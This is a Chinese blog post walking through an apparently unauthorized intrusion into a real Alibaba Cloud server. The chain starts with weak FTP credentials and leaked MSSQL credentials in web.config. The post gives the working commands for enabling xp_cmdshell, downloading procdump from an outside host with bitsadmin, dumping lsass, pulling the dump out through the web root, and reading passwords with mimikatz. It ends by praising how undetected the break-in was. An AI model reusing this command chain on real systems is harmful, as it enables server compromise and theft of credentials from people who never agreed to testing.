ftp引发的一次渗透实战

作者: CSeroad | 来源:发表于2019-08-02 16:37 被阅读99次

前言

无意中遇到ftp弱口令,以为没什么卵用。没想到一个小细节导致服务器直接搞定。

信息收集

IP为阿里云118.19.xx.xx、开放大量端口21,22,80,81,1433,3389,8888等等

ftp弱口令

指纹识别发现81端口为serv-u软件。一个弱口令ftp/ftp直接登录。原以为ftp用来传输文件作用不大,没想到无意中翻找到了web.config的敏感文件。

image.png

打开很明显看到sql server的配置信息。


image.png

mssql命令执行

开启xp_cmdshell组件

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

直接执行系统命令

exec master.dbo.xp_cmdshell  'whoami';
image.png

因为阿里云服务器的原因,想着直接激活guest用户,结果在添加到管理员组的时候并没有成功。查看进程,发现存在防护aliyundun.exe

image.png

那采用prodump导出lsass.dmp,然后从web下载到本地,再使用mimikatz读取密码。
此时有一个问题,web的绝对路径还不知道。

web路径查找

该IP的8888端口正常运行着web服务,为一login.aspx登录地址。
dir搜索logon.aspx

exec master.dbo.xp_cmdshell  'cd /d E: && dir /b /s Logon.aspx'
image.png

找到网站绝对路径,就简单啦~

dump hash

从公网上下载prodump.exe下载到靶机上。

exec master.dbo.xp_cmdshell  'bitsadmin /transfer myDownLoadJob /download /priority normal "http://144.34.xxx.xxx/procdump64.exe" "C:\\Windows\\system32\\procdump.exe"'
procdump.exe -accepteula -ma lsass.exe lsass.dmp

导出lsass.dmp

image.png

再copy lsass.dmp到网站根目录下。需要重命名为txt后缀名。

exec master.dbo.xp_cmdshell  'copy lsass.dmp "E:\Program Files\DESS.Web\tmp.txt"'

需要注意的是:
因为windows文件夹名称中间没有空格,如果文件夹名(或者目录名)中有空格,就必须加双引号了
访问tmp.txt下载。然后本地的mimikatz读取即可。

image.png

总结

不要放过任何一个细节。而且这次成功渗透,我发现全程以静默化状态运行,没有挂马,没有恶意扫描。

相关文章

  • ftp引发的一次渗透实战

    前言 无意中遇到ftp弱口令,以为没什么卵用。没想到一个小细节导致服务器直接搞定。 信息收集 IP为阿里云118....

  • 一次授权渗透实战

    前言 很久没有整理实战文章了,恰好这周项目上有一个目标折腾两天时间,记录分享下其中的心路历程。(本次渗透过程均在目...

  • 《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下

    《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下载 《Web渗透技术及实战案例解析.pdf》PDF...

  • 常用网络端口攻击

    1.对于21端口渗透的几种方法 (1)基础爆破:利用FTP爆破工具,如hydra和msf下的FTP爆破模块;(2)...

  • 常用端口利用

    1.对于21端口渗透的几种方法 (1)基础爆破:利用FTP爆破工具,如hydra和msf下的FTP爆破模块;(2)...

  • 2021-03-05

    linux 下搭建FTP服务实战 1、安装vsftp yum install -...

  • 渗透实战:内网域渗透

    前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使...

  • FTP部署实战

    部署一个内网FTP服务器为了解决公司员工文件存储和下载的需求。要求部署内部FTP服务器,员工可以通过自己的账号的权...

  • MERCY渗透实战

    信息收集 开放的端口服务有: smb枚举探测 139和445的共享服务端口,用enum4linux探测一下 发现q...

  • Sedna渗透实战

    靶机IP:192.168.8.153任务:获取4个flag分别在shell,root,还有靶机中 这个靶机开放了好...

网友评论

    本文标题:ftp引发的一次渗透实战

    本文链接:https://www.haomeiwen.com/subject/ggvldctx.html